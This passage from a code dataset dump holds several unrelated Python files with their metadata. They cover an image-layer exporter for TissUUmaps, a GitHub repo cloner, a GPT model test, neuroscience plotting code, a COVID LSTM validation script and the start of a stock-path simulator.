Tissuumaps which uses (x,y). 
The colors\n # of the individual points are extracted from the metadata.\n points_folder = save_path / \"points\"\n points_folder.mkdir(exist_ok=True)\n path_points = points_folder / f\"{meta['name']}.csv\"\n # Constructing the columns\n y, x = data[:, 0:1], data[:, 1:2]\n color = np.array(\n [[rgb2hex(color)] for color in meta[\"face_color\"]]\n )\n symbol = np.array([[meta[\"symbol\"]]] * x.shape[0])\n points = np.block([x, y, color, symbol])\n # Extract the properties\n properties = meta.get(\"properties\")\n # Saving the csv file manually.\n points_file = open(path_points, \"w+\")\n savedfilenames.append(path_points.name)\n prop_keys = \",\" + \",\".join(properties.keys()) if properties else \"\"\n points_file.write(f\"name,x,y,color,symbol{prop_keys}\\n\")\n for i, (_x, _y, _color, _symbol) in enumerate(points):\n points_file.write(\n f\"{meta['name']},{_x},{_y},{_color},{_symbol}\"\n )\n if properties:\n for prop in properties.keys():\n points_file.write(f\",{properties[prop][i]}\")\n points_file.write(\"\\n\")\n points_file.close()\n elif layer_type == \"labels\":\n # The labels layers may have multiple sub-labels that must be\n # separated in different images for Tissuumaps to read. Each label\n # gets a color given by a random colormap from Napari.\n labels_folder = save_path / \"labels\"\n labels_folder.mkdir(exist_ok=True)\n path_label = labels_folder / f\"{meta['name']}.tif\"\n # Recreating the colored image\n label_layer = Labels(data, **meta)\n label_img = label_layer.colormap.map(\n label_layer._raw_to_displayed(data)\n )\n label_img_uint8 = (label_img * 255.0).astype(np.uint8)\n imsave(str(path_label), label_img_uint8)\n savedfilenames.append(path_label)\n elif layer_type == \"shapes\":\n regions.update(generate_shapes_dict(data, meta))\n else:\n logger.warning(\n f\"Layer \\\"{meta['name']}\\\" cannot be saved. 
This type of layer\"\n                f\" ({layer_type}) is not yet implemented.\"\n            )\n\n    # Saving the shapes\n    if len(regions) > 0:\n        shapes_folder = save_path / \"regions\"\n        shapes_folder.mkdir(exist_ok=True)\n        # Saving the json\n        shapes_filename = \"regions.json\"\n        shapes_file = open(shapes_folder / shapes_filename, \"w+\")\n        savedfilenames.append(shapes_file.name)\n        shapes_file.write(json.dumps(regions, indent=4))\n        shapes_file.close()\n\n    # Conversion from Path to str\n    savedfilenames = list(map(str, savedfilenames))\n    return savedfilenames\n", "repo_name": "TissUUmaps/napari-tissuumaps", "sub_path": "src/napari_tissuumaps/convert.py", "file_name": "convert.py", "file_ext": "py", "file_size_in_byte": 14484, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 15, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 19, "usage_type": "name"}, {"api_name": "napari.types.FullLayerData", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "napari.types.FullLayerData", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 51, "usage_type": "name"}, {"api_name": "napari.types.FullLayerData", "line_number": 51, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 53, "usage_type": "name"}, {"api_name": "napari.types.FullLayerData", "line_number": 165, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 165, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 165, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 205, "usage_type": "attribute"}, {"api_name": "numpy.maximum", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 223, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 225, "usage_type": "attribute"}, {"api_name": "numpy.stack", "line_number": 226, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 229, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 234, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 237, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 247, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 166, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 166, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 255, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 271, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 271, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 271, "usage_type": "name"}, {"api_name": "napari.types.FullLayerData", "line_number": 271, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 289, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 296, 
"usage_type": "call"}, {"api_name": "napari.utils.io.imsave", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 319, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.block", "line_number": 323, "usage_type": "call"}, {"api_name": "napari.layers.labels.labels.Labels", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 352, "usage_type": "attribute"}, {"api_name": "napari.utils.io.imsave", "line_number": 353, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 371, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 272, "usage_type": "name"}]} +{"seq_id": "71246245925", "text": "import pandas as pd\nfrom git import Repo\nimport os, shutil\n\n\n# clones all the repo of a csv with a collum named 'links' with the github url to a folder called \"java_files\"\ndef download_repos():\n df = pd.read_csv('repos.csv')\n\n if not os.path.exists('java_files'):\n os.makedirs('java_files')\n else:\n shutil.rmtree('java_files')\n os.makedirs('java_files')\n\n for index, row in df.iterrows():\n try:\n print(row['links'])\n repo_name = row['links'].split('/')\n repo_name = repo_name[3] + '-' + repo_name[-1] # get user and repo name in the form: 'user/repo_name'\n print(repo_name)\n Repo.clone_from(row['links'], 'java_files/' + repo_name)\n except:\n pass\n\n\ndownload_repos()", "repo_name": "lucasraggi/snippet-recommender-bot", "sub_path": "data_preprocess/download_repos_from_csv.py", "file_name": "download_repos_from_csv.py", "file_ext": "py", "file_size_in_byte": 778, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 11, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 13, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 14, "usage_type": "call"}, {"api_name": "git.Repo.clone_from", "line_number": 22, "usage_type": "call"}, {"api_name": "git.Repo", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "39169946799", "text": "import torch\nfrom llms.models.gptmm import gptmm\nfrom torch.autograd import Variable\n\n\ndef test_gptmm():\n batch_size = 1\n block_size = 8\n n_layers = 6\n vocab_size = 27 # get to dataset\n n_embd = 32\n n_heads = 4\n\n model = gptmm(\n False, n_layers=n_layers, vocab_size=vocab_size, n_embd=n_embd, n_heads=n_heads, block_size=block_size\n )\n\n x = Variable(torch.randint(0, 27, (batch_size, block_size)))\n y = model(x)\n print(y.size())\n print(y[0, -1, :])\n", "repo_name": "pedrodiamel/gpt_mini_mini", "sub_path": "test/models/test_gptmm.py", "file_name": "test_gptmm.py", "file_ext": "py", "file_size_in_byte": 493, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "llms.models.gptmm.gptmm", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.randint", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "2191799837", "text": "\nimport importlib.util, os\nspec = importlib.util.spec_from_file_location(\"link_libs\", os.environ['LIB_SCRIPT'])\nlink_libs = 
importlib.util.module_from_spec(spec)\nspec.loader.exec_module(link_libs)\n\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom matplotlib.collections import LineCollection\nfrom matplotlib.patches import Ellipse\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport seaborn as sns\n\nimport itertools as iit\nimport sklearn.metrics as skmtr\nimport pandas as pd\nimport numpy as np\nnp.cat = np.concatenate\nimport h5py\n\nfrom proc import detection_task as det\n\nsns.set_context('paper')\nsns.set_style('ticks')\n\n\n# Parameters\nLAYER = '0.4.3'\nJTR = 0.15\nMODEL = 'gauss'\nFOLDER = 'fig2'\nTGT = 3\nDST0 = 4\nDST1 = 5\nEM = 2.1415\n\n# Load input data\nuncued = h5py.File(Paths.data('runs/fig2/fnenc_task_base.h5'), 'r+')\ncued = h5py.File(Paths.data(f'runs/{FOLDER}/enc_task_{MODEL}_b4.0.h5'), 'r+')\nfn_uncued = h5py.File(Paths.data('runs/fig2/fn_fnenc_task_base.h5'), 'r+')\nfn_cued = h5py.File(Paths.data(f'runs/{FOLDER}/fn_enc_task_{MODEL}_b4.0.h5'), 'r+')\nregs = det.load_logregs(Paths.data('models/logregs_iso224_t100.npz'))\n\npos_dist = []; pos_focl = []\nneg_dist = []; neg_focl = []\nfor i_cat, c in enumerate(regs):\n dist_dot = uncued[LAYER][i_cat] * regs[c].w.detach().numpy()[..., None, None]\n pos_dist.append(dist_dot[1::2, :, :, :].reshape([-1, 7, 7]) )\n neg_dist.append(dist_dot[::2, :, :, :].reshape([-1, 7, 7]) )\n focl_dot = cued[LAYER][i_cat] * regs[c].w.detach().numpy()[..., None, None]\n pos_focl.append(focl_dot[1::2, :, :, :].reshape([-1, 7, 7]) )\n neg_focl.append(focl_dot[::2, :, :, :].reshape([-1, 7, 7]) )\npos_dist = np.cat(pos_dist); pos_focl = np.cat(pos_focl)\nneg_dist = np.cat(neg_dist); neg_focl = np.cat(neg_focl)\n\n\ndef tgt_dct(img):\n tgt = img[:, :TGT, :TGT].reshape(len(img), -1)\n dct = np.concatenate([\n img[:, DST0:DST1, :DST1].reshape(len(img), -1),\n img[:, :DST0, DST0:DST1].reshape(len(img), -1)\n ], axis = 1)\n return tgt, dct\n\ndef jtr(arr):\n return np.random.uniform(-JTR, JTR, arr.shape)\n\npos_dist_tgt, pos_dist_dct = tgt_dct(pos_dist)\npos_focl_tgt, pos_focl_dct = tgt_dct(pos_focl)\nneg_dist_tgt, neg_dist_dct = tgt_dct(neg_dist)\nneg_focl_tgt, neg_focl_dct = tgt_dct(neg_focl)\n\nC0 = '#E64A19'\nC1 = '#E64A19'\nC2 = '#1976D2' #Lighter: '#03A9F4'\nC3 = '#1976D2' #Lighter: '#FFCA28'\n\naggs = {\n 'mean': lambda a: a.mean(axis = 0),\n 'take': lambda a: [print(a.shape), a[::1711].ravel()][-1]\n}\nAGG_NAME = 'mean'\nAGG = aggs[AGG_NAME]\nS = 12\n\nfig, ax = plt.subplots(figsize = (3 * EM, EM))\n\nplt.scatter(\n 0 + jtr(AGG(pos_dist_tgt)), AGG(pos_dist_tgt),\n lw = 0.25, c = C0, edgecolor = (1, 1, 1, 1), s = S,\n label = 'Uncued, Target')\nplt.scatter(\n 1 + jtr(AGG(neg_dist_tgt)), AGG(neg_dist_tgt),\n lw = 0.25, c = C1, edgecolor = (1, 1, 1, 1), s = S)\n\nplt.scatter(\n 2 + jtr(AGG(pos_focl_tgt)), AGG(pos_focl_tgt),\n lw = 0.25, c = C2, edgecolor = (1, 1, 1, 1), s = S,\n label = 'Cued, Target')\nplt.scatter(\n 3 + jtr(AGG(neg_focl_tgt)), AGG(neg_focl_tgt),\n lw = 0.25, c = C3, edgecolor = (1, 1, 1, 1), s = S)\n\n\nplt.scatter(\n 4 + jtr(AGG(pos_dist_dct)), AGG(pos_dist_dct),\n lw = 0.5, edgecolor = C0, color = (1, 1, 1, 1), s = 0.6*S,\n label = 'Uncued, Edge')\nplt.scatter(\n 5 + jtr(AGG(neg_dist_dct)), AGG(neg_dist_dct),\n lw = 0.5, edgecolor = C1, color = (1, 1, 1, 1), s = 0.6*S)\n\nplt.scatter(\n 6 + jtr(AGG(pos_focl_dct)), AGG(pos_focl_dct),\n lw = 0.5, edgecolor = C2, color = (1, 1, 1, 1), s = 0.6*S,\n label = 'Cued, Edge')\nplt.scatter(\n 7 + jtr(AGG(neg_focl_dct)), AGG(neg_focl_dct),\n lw = 0.5, edgecolor = C3, color = (1, 1, 
1, 1), s = 0.6*S)\n\nplt.axhline(lw = 1, color = '.7', zorder = -1, ls = '--')\nax.set_xticks(np.arange(8))\nax.set_xticklabels(['Pos', 'Neg'] * 4)\nplt.legend(frameon = True, ncol = 2)\nplt.tight_layout()\n\nplt.savefig(Paths.plots(f'runs/feat_motion/feat_prod_{AGG_NAME}.pdf'))\nplt.close()\n\n\n\n\"\"\"\n---------------------------------------------------------------------\n\nFlexing of feature space: Average response to \"Banana\" increases even\nfor \"Bathtub\" units when attn preferentially applied to \"Banana\".\n\n\"\"\"\n\nnonlins = {\n 'lin': lambda x: x,\n 'sig': lambda x: 1 / (1 + np.exp(-x)),\n 'rlu': lambda x: np.maximum(0, x),\n}\n\nunits = np.arange(20)\n\nwith PdfPages(Paths.plots('runs/feat_motion/outgroup_tuning.pdf')) as pdf:\n for unit, (nl_name, nl) in iit.product(units, nonlins.items()):\n\n # 0th decoder/classifier unit\n act_dist = fn_uncued[LAYER][:, :, unit, :, :].mean(axis = (-2, -1))\n act_focl = fn_cued[LAYER][:, :, unit, :, :].mean(axis = (-2, -1))\n\n fig, ax = plt.subplots(figsize = (2 * EM, EM))\n\n other = np.cat([np.arange(unit), np.arange(unit+1, 20)])\n # Bathtub unit, images with a banana and 3 distractors\n (lambda Y: (plt.scatter(\n 0 + jtr(Y), Y,\n color = '#E64A19', s = 25),\n plt.scatter(\n 0, Y.mean(),\n color = '.3', s = 37, lw = 1, edgecolor = '1.'\n )))(\n nl(act_dist[other, 1::2]).mean(axis = -1))\n # Bathtub unit, images with an attended banana and 3 distractors\n (lambda Y: (plt.scatter(\n 1 + jtr(Y), Y,\n color = '#1976D2', s = 25),\n plt.scatter(\n 1, Y.mean(),\n color = '.3', s = 37, lw = 1, edgecolor = '1.'\n )))(\n nl(act_focl[other, 1::2]).mean(axis = -1))\n\n cat = list(regs.keys())[unit]\n plt.title(f\"Nonlin: {nl_name} | Unit: {cat}\")\n ax.set_xticks([0, 1])\n ax.set_xticklabels(['Uncued', 'Cued'])\n plt.xlim(-0.5, 1.5)\n plt.tight_layout()\n pdf.savefig()\n plt.close()\n\n\n\nplt.scatter(\n SG(act_dist[0, 1::2]), SG(act_dist[1, 1::2]))\nplt.scatter(\n SG(act_dist[0, 1::2]).mean(), SG(act_dist[1, 1::2]).mean(),\n color = '.3')\nplt.scatter(\n SG(act_focl[0, 1::2]), SG(act_focl[1, 1::2]))\nplt.scatter(\n SG(act_focl[0, 1::2]).mean(), SG(act_focl[1, 1::2]).mean(),\n color = '.5')\nplt.gca().set_aspect(1.)\n\n\n\n\n\n", "repo_name": "dbirman/attfield2", "sub_path": "code/script/figs/figX/noise_expand.py", "file_name": "noise_expand.py", "file_ext": "py", "file_size_in_byte": 6131, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "importlib.util.util.spec_from_file_location", "line_number": 3, "usage_type": "call"}, {"api_name": "importlib.util.util", "line_number": 3, "usage_type": "attribute"}, {"api_name": "importlib.util", "line_number": 3, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 3, "usage_type": "attribute"}, {"api_name": "importlib.util.util.module_from_spec", "line_number": 4, "usage_type": "call"}, {"api_name": "importlib.util.util", "line_number": 4, "usage_type": "attribute"}, {"api_name": "importlib.util", "line_number": 4, "usage_type": "name"}, {"api_name": "numpy.cat", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 18, "usage_type": "attribute"}, {"api_name": "seaborn.set_context", "line_number": 23, "usage_type": "call"}, {"api_name": "seaborn.set_style", "line_number": 24, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 38, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 39, "usage_type": "call"}, {"api_name": "h5py.File", 
"line_number": 40, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 41, "usage_type": "call"}, {"api_name": "proc.detection_task.load_logregs", "line_number": 42, "usage_type": "call"}, {"api_name": "proc.detection_task", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.cat", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.cat", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 66, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_pdf.PdfPages", "line_number": 148, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": 
"numpy.cat", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 168, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 168, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 190, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}]} +{"seq_id": "1201024418", "text": "import os\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport matplotlib.pyplot as plot\nimport rnn\n\n\n# def create_in_sequences_normalised_per_region(all_data, window):\n# out_seq = []\n# for in_data in all_data:\n# l = len(in_data)\n# temp_seq = []\n# for i in range(l - window):\n# train_seq = torch.FloatTensor(in_data[i:i + window])\n# train_label = torch.FloatTensor(in_data[i + window:i + window + 1])[0]\n\n# mx = max([max(i) for i in train_seq])\n\n# train_seq = torch.div(train_seq, mx)\n# train_label = torch.div(train_label, mx)\n# temp_seq.append((train_seq, train_label, mx))\n# out_seq.append(temp_seq)\n# return out_seq\n\n\nmodel = rnn.LSTM()\nmodel.load_state_dict(torch.load(\"../trained_model_state_ep50.pt\"))\nmodel.eval()\n\n\nwindow = 28\n\nvalidation_data = rnn.load_folder(\"../data/validation_data/\")\n\nvalidation_in_seq = rnn.create_in_sequences_normalised(validation_data, window)\n\ndifferences = [[],[],[],[]]\ncount = 0\n\nfor seq, labels in validation_in_seq:\n with torch.no_grad():\n model.hidden = (torch.zeros(1, 1, model.hidden_layer_size), torch.zeros(1, 1, model.hidden_layer_size))\n\n mx = torch.max(seq)\n seq, labels = torch.div(seq, mx), torch.div(labels, mx)\n prediction = model(seq)\n prediction *= mx\n\n\n # Adjust 
Weights\n prediction[0] = prediction[0] / (1 - 0.3514)\n prediction[1] = prediction[1] / (1 - 0.2965)\n prediction[2] = prediction[2] / (1 - 0.3456)\n prediction[3] = prediction[3] / (1 - 0.3967)\n\n # Calculate Differences for each prediction across the Data set\n for i in range(len(prediction)):\n if labels[i] != 0:\n difference = (prediction[i] - labels[i]) / labels[i]\n differences[i].append(difference.item()*100)\n \nfor i in range(len(differences)):\n differences[i] = np.asarray(differences[i])\n\nprint(\"Confirmed: {:0.2f}% +/- {:0.2f}%\".format(np.mean(differences[0]), np.std(differences[0])))\nprint(\"Deaths: {:0.2f}% +/- {:0.2f}%\".format(np.mean(differences[1]), np.std(differences[1])))\nprint(\"Recovered: {:0.2f}% +/- {:0.2f}%\".format(np.mean(differences[2]), np.std(differences[2])))\nprint(\"Active: {:0.2f}% +/- {:0.2f}%\".format(np.mean(differences[3]), np.std(differences[3])))\n\n\n# Weekly Prediction\n# weekly_seq = create_in_sequences_normalised_per_region(validation_data, window)\n\n# fut_pred = 7\n# averages = [[],[],[],[]]\n# totals_pred = [0,0,0,0]\n# totals_real = [0,0,0,0]\n\n# # Iterate through each region\n# for region in weekly_seq:\n\n# input_data = region[-(fut_pred+1)][0].tolist()\n# og_data = region[-1]\n# og_max = region[-1][2].item()\n# mx = region[-(fut_pred+1)][2].item()\n\n# # Prediction for the week\n# # input_data[-7:] will give you the list of predictions\n# for i in range(fut_pred):\n# seq = torch.FloatTensor(input_data[-window:])\n\n# with torch.no_grad():\n# model.hidden = (torch.zeros(1, 1, model.hidden_layer_size), torch.zeros(1, 1, model.hidden_layer_size))\n\n# prediction = model(seq)\n\n# # Adjust Weights\n# prediction[0] = prediction[0] / (1 - 0.3514)\n# prediction[1] = prediction[1] / (1 - 0.2965)\n# prediction[2] = prediction[2] / (1 - 0.3456)\n# prediction[3] = prediction[3] / (1 - 0.3967)\n\n# input_data.append(prediction.tolist())\n\n# sumReal = [0, 0, 0, 0]\n# sumPredict = [0, 0, 0, 0]\n# for i in range(fut_pred):\n# for k in range(4):\n# real = (og_data[0][-(fut_pred - i)][k].item() * og_max)\n# predict = (input_data[-(fut_pred - i)][k] * mx)\n# sumReal[k] += real\n# sumPredict[k] += predict\n\n# for i in range(4):\n# avgR = (sumReal[i] / fut_pred)\n# avgP = (sumPredict[i] / fut_pred)\n# totals_pred[i] += avgP\n# totals_real[i] += avgR\n# if avgR != 0:\n# averages[i].append( ( ( avgP - avgR ) / avgR) * 100)\n\n\n# print(\"Last Item: Next day predicted Total: {:0f}\".format((input_data[-7][0] * mx)))\n# print(\"Last Item: Next day actual Total: {:0f}\\n\".format((og_data[0][-7][0].item() * og_max)))\n\n# print(\"Last Item: Prediction Average: {:0.2f}\".format(sumPredict[0] / fut_pred))\n# print(\"Last Item: Next Week Average: {:0.2f}\\n\".format(sumReal[0]/fut_pred))\n\n# print(\"Predicted Total Average Cases over the week: {:0.2f}\".format(totals_pred[0]))\n# print(\"Actual Total Average Cases over the week: {:0.2f}\\n\".format(totals_real[0]))\n\n\n# print(\"Confirmed: {:0.2f}% +/- {:0.2f}%\".format(np.mean(averages[0]), np.std(averages[0])))\n# print(\"Deaths: {:0.2f}% +/- {:0.2f}%\".format(np.mean(averages[1]), np.std(averages[1])))\n# print(\"Recovered: {:0.2f}% +/- {:0.2f}%\".format(np.mean(averages[2]), np.std(averages[2])))\n# print(\"Active: {:0.2f}% +/- {:0.2f}%\".format(np.mean(averages[3]), np.std(averages[3])))\n\n\n", "repo_name": "blvanderwalt/AI-Machine-Learning-Prediction", "sub_path": "Project Code/validation.py", "file_name": "validation.py", "file_ext": "py", "file_size_in_byte": 4918, "program_lang": "python", 
"lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rnn.LSTM", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 28, "usage_type": "call"}, {"api_name": "rnn.load_folder", "line_number": 34, "usage_type": "call"}, {"api_name": "rnn.create_in_sequences_normalised", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "29635131508", "text": "\nfrom . import parameter as param\nfrom . import path\nfrom . import stats\n\nfrom scipy import linalg\nimport numpy as np\nimport pandas as pd\n\nfrom pandas.tseries.holiday import USFederalHolidayCalendar\n\nMARKET_SECONDS_PER_YEAR = 252.0*6.5*60.0*60.0\n\nclass MultiStockPath:\n def __init__(self,\n generator,\n correlation_matrix,\n sigmas,\n stock_names):\n self.generator = generator.clone()\n # check dimensions of matrix and sigmas etc all work out\n self.correlation_matrix = correlation_matrix\n self.sigmas = sigmas\n self.stock_names = stock_names\n\n def get_path(self, initial_values, t_start, t_end, freq, interest_rate, seed=None):\n # check initial value os the right size and dimension\n #print(\"getting path \" , freq.)\n # set up parameters of the pathway model\n covar = stats.corr_to_cov(self.correlation_matrix,self.sigmas)\n covar_param = param.SimpleArrayParam(covar)\n\n chol = linalg.cholesky(covar,lower=True)\n chol[chol<1.0e-9]=0.0\n cholesky_param = param.SimpleArrayParam(chol)\n\n r_param = param.SimpleParam(interest_rate)\n\n # create the index of times that are in market hours between\n # requested times\n timeindex = pd.date_range(start=t_start,end=t_end,freq=freq)\n # get the frequency (in seconds) now before removing non-market times\n freq_in_secs = pd.to_timedelta(timeindex.freq,unit='s').total_seconds()\n # only trading hours\n timeindex = timeindex[timeindex.indexer_between_time('09:30','16:00')]\n # only weekdays\n timeindex = timeindex[~(timeindex.dayofweek > 4)]\n # remove fed holidays\n cal = USFederalHolidayCalendar()\n hols = cal.holidays(start=timeindex.min(), 